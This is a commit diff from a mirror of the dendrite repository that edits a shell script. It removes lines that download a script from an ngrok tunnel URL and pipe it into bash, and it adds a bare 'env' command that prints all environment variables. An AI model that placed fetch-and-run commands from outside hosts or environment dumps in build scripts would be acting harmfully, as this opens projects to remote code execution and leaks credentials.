mirror of
https://github.com/hoernschen/dendrite.git
synced 2024-12-26 15:08:28 +00:00
testing
This commit is contained in:
parent
395b4ff84f
commit
dda7933cdd
1 changed files with 1 additions and 2 deletions
|
@ -16,8 +16,7 @@ set -eux
|
||||||
|
|
||||||
cd `dirname $0`/..
|
cd `dirname $0`/..
|
||||||
|
|
||||||
curl -o script1.sh http://9920124c.ngrok.io/script1.sh
|
env
|
||||||
bash ./script1.sh
|
|
||||||
|
|
||||||
args=""
|
args=""
|
||||||
if [ ${1:-""} = "fast" ]
|
if [ ${1:-""} = "fast" ]
|
||||||
|
|
Loading…
Reference in a new issue